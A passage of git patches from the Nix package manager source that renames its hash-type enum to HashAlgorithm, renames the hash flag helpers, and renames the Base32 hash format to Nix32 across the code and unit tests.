parseHashAlgo(*i++); std::string hash = *i++; std::string name = *i++; @@ -405,7 +405,7 @@ static void opQuery(Strings opFlags, Strings opArgs) for (auto & j : maybeUseOutputs(store->followLinksToStorePath(i), useOutput, forceRealise)) { auto info = store->queryPathInfo(j); if (query == qHash) { - assert(info->narHash.type == htSHA256); + assert(info->narHash.algo == HashAlgorithm::SHA256); cout << fmt("%s\n", info->narHash.to_string(HashFormat::Base32, true)); } else if (query == qSize) cout << fmt("%d\n", info->narSize); @@ -541,7 +541,7 @@ static void registerValidity(bool reregister, bool hashGiven, bool canonicalise) if (canonicalise) canonicalisePathMetaData(store->printStorePath(info->path), {}); if (!hashGiven) { - HashResult hash = hashPath(htSHA256, store->printStorePath(info->path)); + HashResult hash = hashPath(HashAlgorithm::SHA256, store->printStorePath(info->path)); info->narHash = hash.first; info->narSize = hash.second; } @@ -763,7 +763,7 @@ static void opVerifyPath(Strings opFlags, Strings opArgs) auto path = store->followLinksToStorePath(i); printMsg(lvlTalkative, "checking path '%s'...", store->printStorePath(path)); auto info = store->queryPathInfo(path); - HashSink sink(info->narHash.type); + HashSink sink(info->narHash.algo); store->narFromPath(path, sink); auto current = sink.finish(); if (current.first != info->narHash) { @@ -979,7 +979,7 @@ static void opServe(Strings opFlags, Strings opArgs) auto deriver = readString(in); ValidPathInfo info { store->parseStorePath(path), - Hash::parseAny(readString(in), htSHA256), + Hash::parseAny(readString(in), HashAlgorithm::SHA256), }; if (deriver != "") info.deriver = store->parseStorePath(deriver); diff --git a/src/nix/add-to-store.cc b/src/nix/add-to-store.cc index f9d487ada..02de796b5 100644 --- a/src/nix/add-to-store.cc +++ b/src/nix/add-to-store.cc @@ -60,11 +60,11 @@ struct CmdAddToStore : MixDryRun, StoreCommand StringSink sink; dumpPath(path, sink); - auto narHash = hashString(htSHA256, sink.s); + auto narHash = hashString(HashAlgorithm::SHA256, sink.s); Hash hash = narHash; if (ingestionMethod == FileIngestionMethod::Flat) { - HashSink hsink(htSHA256); + HashSink hsink(HashAlgorithm::SHA256); readFile(path, hsink); hash = hsink.finish().first; } diff --git a/src/nix/hash.cc b/src/nix/hash.cc index 62f96ef1d..638178afa 100644 --- a/src/nix/hash.cc +++ b/src/nix/hash.cc @@ -18,7 +18,7 @@ struct CmdHashBase : Command FileIngestionMethod mode; HashFormat hashFormat = HashFormat::SRI; bool truncate = false; - HashType ht = htSHA256; + HashAlgorithm ha = HashAlgorithm::SHA256; std::vector paths; std::optional modulus; @@ -48,7 +48,7 @@ struct CmdHashBase : Command .handler = {&hashFormat, HashFormat::Base16}, }); - addFlag(Flag::mkHashTypeFlag("type", &ht)); + addFlag(Flag::mkHashTypeFlag("type", &ha)); #if 0 addFlag({ @@ -84,9 +84,9 @@ struct CmdHashBase : Command std::unique_ptr hashSink; if (modulus) - hashSink = std::make_unique(ht, *modulus); + hashSink = std::make_unique(ha, *modulus); else - hashSink = std::make_unique(ht); + hashSink = std::make_unique(ha); switch (mode) { case FileIngestionMethod::Flat: @@ -107,7 +107,7 @@ struct CmdHashBase : Command struct CmdToBase : Command { HashFormat hashFormat; - std::optional ht; + std::optional ht; std::vector args; CmdToBase(HashFormat hashFormat) : hashFormat(hashFormat) @@ -139,7 +139,7 @@ struct CmdHashConvert : Command { std::optional from; HashFormat to; - std::optional type; + std::optional type; std::vector hashStrings; CmdHashConvert(): to(HashFormat::SRI) { @@ -166,7 +166,7 @@ struct CmdHashConvert : Command .description = "Specify the algorithm if it can't be auto-detected.", .labels = {"hash algorithm"}, .handler = {[this](std::string str) { - type = parseHashType(str); + type = parseHashAlgo(str); }}, }); expectArgs({ @@ -223,7 +223,7 @@ static auto rCmdHash = registerCommand("hash"); /* Legacy nix-hash command. */ static int compatNixHash(int argc, char * * argv) { - std::optional ht; + std::optional ha; bool flat = false; HashFormat hashFormat = HashFormat::Base16; bool truncate = false; @@ -243,7 +243,7 @@ static int compatNixHash(int argc, char * * argv) else if (*arg == "--truncate") truncate = true; else if (*arg == "--type") { std::string s = getArg(*arg, arg, end); - ht = parseHashType(s); + ha = parseHashAlgo(s); } else if (*arg == "--to-base16") { op = opTo; @@ -270,8 +270,8 @@ static int compatNixHash(int argc, char * * argv) if (op == opHash) { CmdHashBase cmd(flat ? FileIngestionMethod::Flat : FileIngestionMethod::Recursive); - if (!ht.has_value()) ht = htMD5; - cmd.ht = ht.value(); + if (!ha.has_value()) ha = HashAlgorithm::MD5; + cmd.ha = ha.value(); cmd.hashFormat = hashFormat; cmd.truncate = truncate; cmd.paths = ss; @@ -281,7 +281,7 @@ static int compatNixHash(int argc, char * * argv) else { CmdToBase cmd(hashFormat); cmd.args = ss; - if (ht.has_value()) cmd.ht = ht; + if (ha.has_value()) cmd.ht = ha; cmd.run(); } diff --git a/src/nix/prefetch.cc b/src/nix/prefetch.cc index 3ed7946a8..09f33a51e 100644 --- a/src/nix/prefetch.cc +++ b/src/nix/prefetch.cc @@ -46,13 +46,13 @@ std::string resolveMirrorUrl(EvalState & state, const std::string & url) } std::tuple prefetchFile( - ref store, - std::string_view url, - std::optional name, - HashType hashType, - std::optional expectedHash, - bool unpack, - bool executable) + ref store, + std::string_view url, + std::optional name, + HashAlgorithm hashAlgo, + std::optional expectedHash, + bool unpack, + bool executable) { auto ingestionMethod = unpack || executable ? FileIngestionMethod::Recursive : FileIngestionMethod::Flat; @@ -69,7 +69,7 @@ std::tuple prefetchFile( /* If an expected hash is given, the file may already exist in the store. */ if (expectedHash) { - hashType = expectedHash->type; + hashAlgo = expectedHash->algo; storePath = store->makeFixedOutputPath(*name, FixedOutputInfo { .method = ingestionMethod, .hash = *expectedHash, @@ -122,7 +122,7 @@ std::tuple prefetchFile( Activity act(*logger, lvlChatty, actUnknown, fmt("adding '%s' to the store", url)); - auto info = store->addToStoreSlow(*name, tmpFile, ingestionMethod, hashType, expectedHash); + auto info = store->addToStoreSlow(*name, tmpFile, ingestionMethod, hashAlgo, expectedHash); storePath = info.path; assert(info.ca); hash = info.ca->hash; @@ -134,7 +134,7 @@ std::tuple prefetchFile( static int main_nix_prefetch_url(int argc, char * * argv) { { - HashType ht = htSHA256; + HashAlgorithm ha = HashAlgorithm::SHA256; std::vector args; bool printPath = getEnv("PRINT_PATH") == "1"; bool fromExpr = false; @@ -155,7 +155,7 @@ static int main_nix_prefetch_url(int argc, char * * argv) printVersion("nix-prefetch-url"); else if (*arg == "--type") { auto s = getArg(*arg, arg, end); - ht = parseHashType(s); + ha = parseHashAlgo(s); } else if (*arg == "--print-path") printPath = true; @@ -233,10 +233,10 @@ static int main_nix_prefetch_url(int argc, char * * argv) std::optional expectedHash; if (args.size() == 2) - expectedHash = Hash::parseAny(args[1], ht); + expectedHash = Hash::parseAny(args[1], ha); auto [storePath, hash] = prefetchFile( - store, resolveMirrorUrl(*state, url), name, ht, expectedHash, unpack, executable); + store, resolveMirrorUrl(*state, url), name, ha, expectedHash, unpack, executable); stopProgressBar(); @@ -258,7 +258,7 @@ struct CmdStorePrefetchFile : StoreCommand, MixJSON std::string url; bool executable = false; std::optional name; - HashType hashType = htSHA256; + HashAlgorithm hashAlgo = HashAlgorithm::SHA256; std::optional expectedHash; CmdStorePrefetchFile() @@ -275,11 +275,11 @@ struct CmdStorePrefetchFile : StoreCommand, MixJSON .description = "The expected hash of the file.", .labels = {"hash"}, .handler = {[&](std::string s) { - expectedHash = Hash::parseAny(s, hashType); + expectedHash = Hash::parseAny(s, hashAlgo); }} }); - addFlag(Flag::mkHashTypeFlag("hash-type", &hashType)); + addFlag(Flag::mkHashTypeFlag("hash-type", &hashAlgo)); addFlag({ .longName = "executable", @@ -305,7 +305,7 @@ struct CmdStorePrefetchFile : StoreCommand, MixJSON } void run(ref store) override { - auto [storePath, hash] = prefetchFile(store, url, name, hashType, expectedHash, false, executable); + auto [storePath, hash] = prefetchFile(store, url, name, hashAlgo, expectedHash, false, executable); if (json) { auto res = nlohmann::json::object(); diff --git a/src/nix/profile.cc b/src/nix/profile.cc index 147b4680b..9d9492da9 100644 --- a/src/nix/profile.cc +++ b/src/nix/profile.cc @@ -216,7 +216,7 @@ struct ProfileManifest StringSink sink; dumpPath(tempDir, sink); - auto narHash = hashString(htSHA256, sink.s); + auto narHash = hashString(HashAlgorithm::SHA256, sink.s); ValidPathInfo info { *store, diff --git a/src/nix/verify.cc b/src/nix/verify.cc index 78cb765ce..cd0f6d95f 100644 --- a/src/nix/verify.cc +++ b/src/nix/verify.cc @@ -98,7 +98,7 @@ struct CmdVerify : StorePathsCommand if (!noContents) { - auto hashSink = HashSink(info->narHash.type); + auto hashSink = HashSink(info->narHash.algo); store->narFromPath(info->path, hashSink); diff --git a/tests/unit/libstore/common-protocol.cc b/tests/unit/libstore/common-protocol.cc index c09ac6a3e..d23805fc3 100644 --- a/tests/unit/libstore/common-protocol.cc +++ b/tests/unit/libstore/common-protocol.cc @@ -84,15 +84,15 @@ CHARACTERIZATION_TEST( (std::tuple { ContentAddress { .method = TextIngestionMethod {}, - .hash = hashString(HashType::htSHA256, "Derive(...)"), + .hash = hashString(HashAlgorithm::SHA256, "Derive(...)"), }, ContentAddress { .method = FileIngestionMethod::Flat, - .hash = hashString(HashType::htSHA1, "blob blob..."), + .hash = hashString(HashAlgorithm::SHA1, "blob blob..."), }, ContentAddress { .method = FileIngestionMethod::Recursive, - .hash = hashString(HashType::htSHA256, "(...)"), + .hash = hashString(HashAlgorithm::SHA256, "(...)"), }, })) @@ -179,7 +179,7 @@ CHARACTERIZATION_TEST( std::optional { ContentAddress { .method = FileIngestionMethod::Flat, - .hash = hashString(HashType::htSHA1, "blob blob..."), + .hash = hashString(HashAlgorithm::SHA1, "blob blob..."), }, }, })) diff --git a/tests/unit/libstore/derivation.cc b/tests/unit/libstore/derivation.cc index a7f4488fa..7a4b1403a 100644 --- a/tests/unit/libstore/derivation.cc +++ b/tests/unit/libstore/derivation.cc @@ -134,7 +134,7 @@ TEST_JSON(DynDerivationTest, caFixedText, TEST_JSON(CaDerivationTest, caFloating, (DerivationOutput::CAFloating { .method = FileIngestionMethod::Recursive, - .hashType = htSHA256, + .hashAlgo = HashAlgorithm::SHA256, }), "drv-name", "output-name") @@ -145,7 +145,7 @@ TEST_JSON(DerivationTest, deferred, TEST_JSON(ImpureDerivationTest, impure, (DerivationOutput::Impure { .method = FileIngestionMethod::Recursive, - .hashType = htSHA256, + .hashAlgo = HashAlgorithm::SHA256, }), "drv-name", "output-name") diff --git a/tests/unit/libstore/nar-info.cc b/tests/unit/libstore/nar-info.cc index 4f124e89e..bd10602e7 100644 --- a/tests/unit/libstore/nar-info.cc +++ b/tests/unit/libstore/nar-info.cc @@ -26,7 +26,7 @@ static NarInfo makeNarInfo(const Store & store, bool includeImpureInfo) { "foo", FixedOutputInfo { .method = FileIngestionMethod::Recursive, - .hash = hashString(HashType::htSHA256, "(...)"), + .hash = hashString(HashAlgorithm::SHA256, "(...)"), .references = { .others = { diff --git a/tests/unit/libstore/path-info.cc b/tests/unit/libstore/path-info.cc index 18f00ca19..80d6fcfed 100644 --- a/tests/unit/libstore/path-info.cc +++ b/tests/unit/libstore/path-info.cc @@ -25,7 +25,7 @@ static UnkeyedValidPathInfo makePathInfo(const Store & store, bool includeImpure "foo", FixedOutputInfo { .method = FileIngestionMethod::Recursive, - .hash = hashString(HashType::htSHA256, "(...)"), + .hash = hashString(HashAlgorithm::SHA256, "(...)"), .references = { .others = { diff --git a/tests/unit/libstore/serve-protocol.cc b/tests/unit/libstore/serve-protocol.cc index c8ac87a04..6d2054f7d 100644 --- a/tests/unit/libstore/serve-protocol.cc +++ b/tests/unit/libstore/serve-protocol.cc @@ -53,15 +53,15 @@ VERSIONED_CHARACTERIZATION_TEST( (std::tuple { ContentAddress { .method = TextIngestionMethod {}, - .hash = hashString(HashType::htSHA256, "Derive(...)"), + .hash = hashString(HashAlgorithm::SHA256, "Derive(...)"), }, ContentAddress { .method = FileIngestionMethod::Flat, - .hash = hashString(HashType::htSHA1, "blob blob..."), + .hash = hashString(HashAlgorithm::SHA1, "blob blob..."), }, ContentAddress { .method = FileIngestionMethod::Recursive, - .hash = hashString(HashType::htSHA256, "(...)"), + .hash = hashString(HashAlgorithm::SHA256, "(...)"), }, })) @@ -271,7 +271,7 @@ VERSIONED_CHARACTERIZATION_TEST( std::optional { ContentAddress { .method = FileIngestionMethod::Flat, - .hash = hashString(HashType::htSHA1, "blob blob..."), + .hash = hashString(HashAlgorithm::SHA1, "blob blob..."), }, }, })) diff --git a/tests/unit/libstore/worker-protocol.cc b/tests/unit/libstore/worker-protocol.cc index ad5943c69..91f804f0c 100644 --- a/tests/unit/libstore/worker-protocol.cc +++ b/tests/unit/libstore/worker-protocol.cc @@ -55,15 +55,15 @@ VERSIONED_CHARACTERIZATION_TEST( (std::tuple { ContentAddress { .method = TextIngestionMethod {}, - .hash = hashString(HashType::htSHA256, "Derive(...)"), + .hash = hashString(HashAlgorithm::SHA256, "Derive(...)"), }, ContentAddress { .method = FileIngestionMethod::Flat, - .hash = hashString(HashType::htSHA1, "blob blob..."), + .hash = hashString(HashAlgorithm::SHA1, "blob blob..."), }, ContentAddress { .method = FileIngestionMethod::Recursive, - .hash = hashString(HashType::htSHA256, "(...)"), + .hash = hashString(HashAlgorithm::SHA256, "(...)"), }, })) @@ -464,7 +464,7 @@ VERSIONED_CHARACTERIZATION_TEST( "foo", FixedOutputInfo { .method = FileIngestionMethod::Recursive, - .hash = hashString(HashType::htSHA256, "(...)"), + .hash = hashString(HashAlgorithm::SHA256, "(...)"), .references = { .others = { StorePath { @@ -539,7 +539,7 @@ VERSIONED_CHARACTERIZATION_TEST( std::optional { ContentAddress { .method = FileIngestionMethod::Flat, - .hash = hashString(HashType::htSHA1, "blob blob..."), + .hash = hashString(HashAlgorithm::SHA1, "blob blob..."), }, }, })) diff --git a/tests/unit/libutil/git.cc b/tests/unit/libutil/git.cc index 551a2d105..141a55816 100644 --- a/tests/unit/libutil/git.cc +++ b/tests/unit/libutil/git.cc @@ -95,7 +95,7 @@ const static Tree tree = { { .mode = Mode::Regular, // hello world with special chars from above - .hash = Hash::parseAny("63ddb340119baf8492d2da53af47e8c7cfcd5eb2", htSHA1), + .hash = Hash::parseAny("63ddb340119baf8492d2da53af47e8c7cfcd5eb2", HashAlgorithm::SHA1), }, }, { @@ -103,7 +103,7 @@ const static Tree tree = { { .mode = Mode::Executable, // ditto - .hash = Hash::parseAny("63ddb340119baf8492d2da53af47e8c7cfcd5eb2", htSHA1), + .hash = Hash::parseAny("63ddb340119baf8492d2da53af47e8c7cfcd5eb2", HashAlgorithm::SHA1), }, }, { @@ -111,7 +111,7 @@ const static Tree tree = { { .mode = Mode::Directory, // Empty directory hash - .hash = Hash::parseAny("4b825dc642cb6eb9a060e54bf8d69288fbee4904", htSHA1), + .hash = Hash::parseAny("4b825dc642cb6eb9a060e54bf8d69288fbee4904", HashAlgorithm::SHA1), }, }, }; @@ -174,7 +174,7 @@ TEST_F(GitTest, both_roundrip) { std::function dumpHook; dumpHook = [&](const CanonPath & path) { StringSink s; - HashSink hashSink { htSHA1 }; + HashSink hashSink { HashAlgorithm::SHA1 }; TeeSink s2 { s, hashSink }; auto mode = dump( files, path, s2, dumpHook, diff --git a/tests/unit/libutil/hash.cc b/tests/unit/libutil/hash.cc index 92291afce..4d82c7f09 100644 --- a/tests/unit/libutil/hash.cc +++ b/tests/unit/libutil/hash.cc @@ -13,28 +13,28 @@ namespace nix { TEST(hashString, testKnownMD5Hashes1) { // values taken from: https://tools.ietf.org/html/rfc1321 auto s1 = ""; - auto hash = hashString(HashType::htMD5, s1); + auto hash = hashString(HashAlgorithm::MD5, s1); ASSERT_EQ(hash.to_string(HashFormat::Base16, true), "md5:d41d8cd98f00b204e9800998ecf8427e"); } TEST(hashString, testKnownMD5Hashes2) { // values taken from: https://tools.ietf.org/html/rfc1321 auto s2 = "abc"; - auto hash = hashString(HashType::htMD5, s2); + auto hash = hashString(HashAlgorithm::MD5, s2); ASSERT_EQ(hash.to_string(HashFormat::Base16, true), "md5:900150983cd24fb0d6963f7d28e17f72"); } TEST(hashString, testKnownSHA1Hashes1) { // values taken from: https://tools.ietf.org/html/rfc3174 auto s = "abc"; - auto hash = hashString(HashType::htSHA1, s); + auto hash = hashString(HashAlgorithm::SHA1, s); ASSERT_EQ(hash.to_string(HashFormat::Base16, true),"sha1:a9993e364706816aba3e25717850c26c9cd0d89d"); } TEST(hashString, testKnownSHA1Hashes2) { // values taken from: https://tools.ietf.org/html/rfc3174 auto s = "abcdbcdecdefdefgefghfghighijhijkijkljklmklmnlmnomnopnopq"; - auto hash = hashString(HashType::htSHA1, s); + auto hash = hashString(HashAlgorithm::SHA1, s); ASSERT_EQ(hash.to_string(HashFormat::Base16, true),"sha1:84983e441c3bd26ebaae4aa1f95129e5e54670f1"); } @@ -42,7 +42,7 @@ namespace nix { // values taken from: https://tools.ietf.org/html/rfc4634 auto s = "abc"; - auto hash = hashString(HashType::htSHA256, s); + auto hash = hashString(HashAlgorithm::SHA256, s); ASSERT_EQ(hash.to_string(HashFormat::Base16, true), "sha256:ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad"); } @@ -50,7 +50,7 @@ namespace nix { TEST(hashString, testKnownSHA256Hashes2) { // values taken from: https://tools.ietf.org/html/rfc4634 auto s = "abcdbcdecdefdefgefghfghighijhijkijkljklmklmnlmnomnopnopq"; - auto hash = hashString(HashType::htSHA256, s); + auto hash = hashString(HashAlgorithm::SHA256, s); ASSERT_EQ(hash.to_string(HashFormat::Base16, true), "sha256:248d6a61d20638b8e5c026930c3e6039a33ce45964ff2167f6ecedd419db06c1"); } @@ -58,7 +58,7 @@ namespace nix { TEST(hashString, testKnownSHA512Hashes1) { // values taken from: https://tools.ietf.org/html/rfc4634 auto s = "abc"; - auto hash = hashString(HashType::htSHA512, s); + auto hash = hashString(HashAlgorithm::SHA512, s); ASSERT_EQ(hash.to_string(HashFormat::Base16, true), "sha512:ddaf35a193617abacc417349ae20413112e6fa4e89a9" "7ea20a9eeee64b55d39a2192992a274fc1a836ba3c23a3feebbd" @@ -68,7 +68,7 @@ namespace nix { // values taken from: https://tools.ietf.org/html/rfc4634 auto s = "abcdefghbcdefghicdefghijdefghijkefghijklfghijklmghijklmnhijklmnoijklmnopjklmnopqklmnopqrlmnopqrsmnopqrstnopqrstu"; - auto hash = hashString(HashType::htSHA512, s); + auto hash = hashString(HashAlgorithm::SHA512, s); ASSERT_EQ(hash.to_string(HashFormat::Base16, true), "sha512:8e959b75dae313da8cf4f72814fc143f8f7779c6eb9f7fa1" "7299aeadb6889018501d289e4900f7e4331b99dec4b5433a" From 837b889c41543b32154ceade2363ec6ad6dff15d Mon Sep 17 00:00:00 2001 From: Peter Kolloch Date: Tue, 28 Nov 2023 14:41:44 +0100 Subject: [PATCH 060/654] Further HashType renaming + using mkHashAlgoOptFlag for new conversion https://github.com/NixOS/nix/issues/8876 --- src/libutil/args.cc | 38 +++++++++++++++++++------------------- src/libutil/args.hh | 4 ++-- src/nix/hash.cc | 17 +++++------------ src/nix/prefetch.cc | 2 +- 4 files changed, 27 insertions(+), 34 deletions(-) diff --git a/src/libutil/args.cc b/src/libutil/args.cc index ac3727d11..7ea1647d9 100644 --- a/src/libutil/args.cc +++ b/src/libutil/args.cc @@ -544,36 +544,36 @@ nlohmann::json Args::toJSON() return res; } -static void hashTypeCompleter(AddCompletions & completions, size_t index, std::string_view prefix) +static void hashAlgoCompleter(AddCompletions & completions, size_t index, std::string_view prefix) { for (auto & type : hashAlgorithms) if (hasPrefix(type, prefix)) completions.add(type); } -Args::Flag Args::Flag::mkHashTypeFlag(std::string && longName, HashAlgorithm * ha) +Args::Flag Args::Flag::mkHashAlgoFlag(std::string && longName, HashAlgorithm * ha) { - return Flag { - .longName = std::move(longName), - .description = "hash algorithm ('md5', 'sha1', 'sha256', or 'sha512')", - .labels = {"hash-algo"}, - .handler = {[ha](std::string s) { - *ha = parseHashAlgo(s); - }}, - .completer = hashTypeCompleter, + return Flag{ + .longName = std::move(longName), + .description = "hash algorithm ('md5', 'sha1', 'sha256', or 'sha512')", + .labels = {"hash-algo"}, + .handler = {[ha](std::string s) { + *ha = parseHashAlgo(s); + }}, + .completer = hashAlgoCompleter, }; } -Args::Flag Args::Flag::mkHashTypeOptFlag(std::string && longName, std::optional * oha) +Args::Flag Args::Flag::mkHashAlgoOptFlag(std::string && longName, std::optional * oha) { - return Flag { - .longName = std::move(longName), - .description = "hash algorithm ('md5', 'sha1', 'sha256', or 'sha512'). Optional as can also be gotten from SRI hash itself.", - .labels = {"hash-algo"}, - .handler = {[oha](std::string s) { - *oha = std::optional {parseHashAlgo(s) }; - }}, - .completer = hashTypeCompleter, + return Flag{ + .longName = std::move(longName), + .description = "hash algorithm ('md5', 'sha1', 'sha256', or 'sha512'). Optional as can also be gotten from SRI hash itself.", + .labels = {"hash-algo"}, + .handler = {[oha](std::string s) { + *oha = std::optional{parseHashAlgo(s)}; + }}, + .completer = hashAlgoCompleter, }; } diff --git a/src/libutil/args.hh b/src/libutil/args.hh index 0cff76158..653a9bbd6 100644 --- a/src/libutil/args.hh +++ b/src/libutil/args.hh @@ -175,8 +175,8 @@ protected: std::optional experimentalFeature; - static Flag mkHashTypeFlag(std::string && longName, HashAlgorithm * ha); - static Flag mkHashTypeOptFlag(std::string && longName, std::optional * oha); + static Flag mkHashAlgoFlag(std::string && longName, HashAlgorithm * ha); + static Flag mkHashAlgoOptFlag(std::string && longName, std::optional * oha); }; /** diff --git a/src/nix/hash.cc b/src/nix/hash.cc index 638178afa..173043c8a 100644 --- a/src/nix/hash.cc +++ b/src/nix/hash.cc @@ -48,7 +48,7 @@ struct CmdHashBase : Command .handler = {&hashFormat, HashFormat::Base16}, }); - addFlag(Flag::mkHashTypeFlag("type", &ha)); + addFlag(Flag::mkHashAlgoFlag("type", &ha)); #if 0 addFlag({ @@ -112,7 +112,7 @@ struct CmdToBase : Command CmdToBase(HashFormat hashFormat) : hashFormat(hashFormat) { - addFlag(Flag::mkHashTypeOptFlag("type", &ht)); + addFlag(Flag::mkHashAlgoOptFlag("type", &ht)); expectArgs("strings", &args); } @@ -139,7 +139,7 @@ struct CmdHashConvert : Command { std::optional from; HashFormat to; - std::optional type; + std::optional algo; std::vector hashStrings; CmdHashConvert(): to(HashFormat::SRI) { @@ -161,14 +161,7 @@ struct CmdHashConvert : Command to = parseHashFormat(str); }}, }); - addFlag({ - .longName = "algo", - .description = "Specify the algorithm if it can't be auto-detected.", - .labels = {"hash algorithm"}, - .handler = {[this](std::string str) { - type = parseHashAlgo(str); - }}, - }); + addFlag(Args::Flag::mkHashAlgoOptFlag("algo", &algo)); expectArgs({ .label = "hashes", .handler = {&hashStrings}, @@ -184,7 +177,7 @@ struct CmdHashConvert : Command void run() override { for (const auto& s: hashStrings) { - Hash h = Hash::parseAny(s, type); + Hash h = Hash::parseAny(s, algo); if (from && h.to_string(*from, from == HashFormat::SRI) != s) { auto from_as_string = printHashFormat(*from); throw BadHash("input hash '%s' does not have the expected format '--from %s'", s, from_as_string); diff --git a/src/nix/prefetch.cc b/src/nix/prefetch.cc index 09f33a51e..bbfeb8aa4 100644 --- a/src/nix/prefetch.cc +++ b/src/nix/prefetch.cc @@ -279,7 +279,7 @@ struct CmdStorePrefetchFile : StoreCommand, MixJSON }} }); - addFlag(Flag::mkHashTypeFlag("hash-type", &hashAlgo)); + addFlag(Flag::mkHashAlgoFlag("hash-type", &hashAlgo)); addFlag({ .longName = "executable", From fc6f29053aa69b6b14bcad93cb273b1c266e74fe Mon Sep 17 00:00:00 2001 From: Peter Kolloch Date: Tue, 28 Nov 2023 15:38:15 +0100 Subject: [PATCH 061/654] Renamed HashFormat::Base32 to HashFormat::Nix32 ...and also adjusted parsing accordingly. Also added CLI completion for HashFormats. https://github.com/NixOS/nix/issues/8876 --- src/libexpr/primops/fetchTree.cc | 2 +- src/libfetchers/git.cc | 2 +- src/libfetchers/mercurial.cc | 2 +- src/libstore/binary-cache-store.cc | 4 +- src/libstore/build/local-derivation-goal.cc | 2 +- src/libstore/content-address.cc | 2 +- src/libstore/derivations.cc | 2 +- src/libstore/downstream-placeholder.cc | 4 +- src/libstore/export-import.cc | 2 +- src/libstore/gc.cc | 2 +- src/libstore/local-store.cc | 10 +- src/libstore/nar-info-disk-cache.cc | 4 +- src/libstore/nar-info.cc | 4 +- src/libstore/optimise-store.cc | 4 +- src/libstore/parsed-derivations.cc | 2 +- src/libstore/path-info.cc | 6 +- src/libstore/path.cc | 2 +- src/libutil/args.cc | 40 ++++++- src/libutil/args.hh | 3 + src/libutil/hash.cc | 25 ++-- src/libutil/hash.hh | 10 +- src/libutil/references.cc | 4 +- src/nix-store/nix-store.cc | 8 +- src/nix/hash.cc | 40 +++---- src/nix/verify.cc | 4 +- tests/functional/hash.sh | 6 +- .../lang/eval-okay-convertHash.err.exp | 108 ++++++++++++++++++ .../functional/lang/eval-okay-convertHash.exp | 2 +- .../functional/lang/eval-okay-convertHash.nix | 2 + tests/unit/libutil/hash.cc | 2 +- 30 files changed, 228 insertions(+), 82 deletions(-) create mode 100644 tests/functional/lang/eval-okay-convertHash.err.exp diff --git a/src/libexpr/primops/fetchTree.cc b/src/libexpr/primops/fetchTree.cc index ef80c634f..15f870a95 100644 --- a/src/libexpr/primops/fetchTree.cc +++ b/src/libexpr/primops/fetchTree.cc @@ -304,7 +304,7 @@ static void fetch(EvalState & state, const PosIdx pos, Value * * args, Value & v : hashFile(HashAlgorithm::SHA256, state.store->toRealPath(storePath)); if (hash != *expectedHash) state.debugThrowLastTrace(EvalError((unsigned int) 102, "hash mismatch in file downloaded from '%s':\n specified: %s\n got: %s", - *url, expectedHash->to_string(HashFormat::Base32, true), hash.to_string(HashFormat::Base32, true))); + *url, expectedHash->to_string(HashFormat::Nix32, true), hash.to_string(HashFormat::Nix32, true))); } state.allowAndSetStorePathString(storePath, v); diff --git a/src/libfetchers/git.cc b/src/libfetchers/git.cc index a89acc1c0..9e6ba8963 100644 --- a/src/libfetchers/git.cc +++ b/src/libfetchers/git.cc @@ -52,7 +52,7 @@ bool touchCacheFile(const Path & path, time_t touch_time) Path getCachePath(std::string_view key) { return getCacheDir() + "/nix/gitv3/" + - hashString(HashAlgorithm::SHA256, key).to_string(HashFormat::Base32, false); + hashString(HashAlgorithm::SHA256, key).to_string(HashFormat::Nix32, false); } // Returns the name of the HEAD branch. diff --git a/src/libfetchers/mercurial.cc b/src/libfetchers/mercurial.cc index 713f24bbb..6056b9a3c 100644 --- a/src/libfetchers/mercurial.cc +++ b/src/libfetchers/mercurial.cc @@ -267,7 +267,7 @@ struct MercurialInputScheme : InputScheme } } - Path cacheDir = fmt("%s/nix/hg/%s", getCacheDir(), hashString(HashAlgorithm::SHA256, actualUrl).to_string(HashFormat::Base32, false)); + Path cacheDir = fmt("%s/nix/hg/%s", getCacheDir(), hashString(HashAlgorithm::SHA256, actualUrl).to_string(HashFormat::Nix32, false)); /* If this is a commit hash that we already have, we don't have to pull again. */ diff --git a/src/libstore/binary-cache-store.cc b/src/libstore/binary-cache-store.cc index f287d72a8..2837e8934 100644 --- a/src/libstore/binary-cache-store.cc +++ b/src/libstore/binary-cache-store.cc @@ -165,8 +165,8 @@ ref BinaryCacheStore::addToStoreCommon( auto [fileHash, fileSize] = fileHashSink.finish(); narInfo->fileHash = fileHash; narInfo->fileSize = fileSize; - narInfo->url = "nar/" + narInfo->fileHash->to_string(HashFormat::Base32, false) + ".nar" - + (compression == "xz" ? ".xz" : + narInfo->url = "nar/" + narInfo->fileHash->to_string(HashFormat::Nix32, false) + ".nar" + + (compression == "xz" ? ".xz" : compression == "bzip2" ? ".bz2" : compression == "zstd" ? ".zst" : compression == "lzip" ? ".lzip" : diff --git a/src/libstore/build/local-derivation-goal.cc b/src/libstore/build/local-derivation-goal.cc index 4c3dc1f5c..802b39f84 100644 --- a/src/libstore/build/local-derivation-goal.cc +++ b/src/libstore/build/local-derivation-goal.cc @@ -1067,7 +1067,7 @@ void LocalDerivationGoal::initTmpDir() { env[i.first] = i.second; } else { auto hash = hashString(HashAlgorithm::SHA256, i.first); - std::string fn = ".attr-" + hash.to_string(HashFormat::Base32, false); + std::string fn = ".attr-" + hash.to_string(HashFormat::Nix32, false); Path p = tmpDir + "/" + fn; writeFile(p, rewriteStrings(i.second, inputRewrites)); chownToBuilder(p); diff --git a/src/libstore/content-address.cc b/src/libstore/content-address.cc index de8194f73..f42a13126 100644 --- a/src/libstore/content-address.cc +++ b/src/libstore/content-address.cc @@ -61,7 +61,7 @@ std::string ContentAddress::render() const + makeFileIngestionPrefix(method); }, }, method.raw) - + this->hash.to_string(HashFormat::Base32, true); + + this->hash.to_string(HashFormat::Nix32, true); } /** diff --git a/src/libstore/derivations.cc b/src/libstore/derivations.cc index c68631c1a..664ab7556 100644 --- a/src/libstore/derivations.cc +++ b/src/libstore/derivations.cc @@ -958,7 +958,7 @@ void writeDerivation(Sink & out, const StoreDirConfig & store, const BasicDeriva std::string hashPlaceholder(const OutputNameView outputName) { // FIXME: memoize? - return "/" + hashString(HashAlgorithm::SHA256, concatStrings("nix-output:", outputName)).to_string(HashFormat::Base32, false); + return "/" + hashString(HashAlgorithm::SHA256, concatStrings("nix-output:", outputName)).to_string(HashFormat::Nix32, false); } diff --git a/src/libstore/downstream-placeholder.cc b/src/libstore/downstream-placeholder.cc index 10df37fa4..91d47f946 100644 --- a/src/libstore/downstream-placeholder.cc +++ b/src/libstore/downstream-placeholder.cc @@ -5,7 +5,7 @@ namespace nix { std::string DownstreamPlaceholder::render() const { - return "/" + hash.to_string(HashFormat::Base32, false); + return "/" + hash.to_string(HashFormat::Nix32, false); } 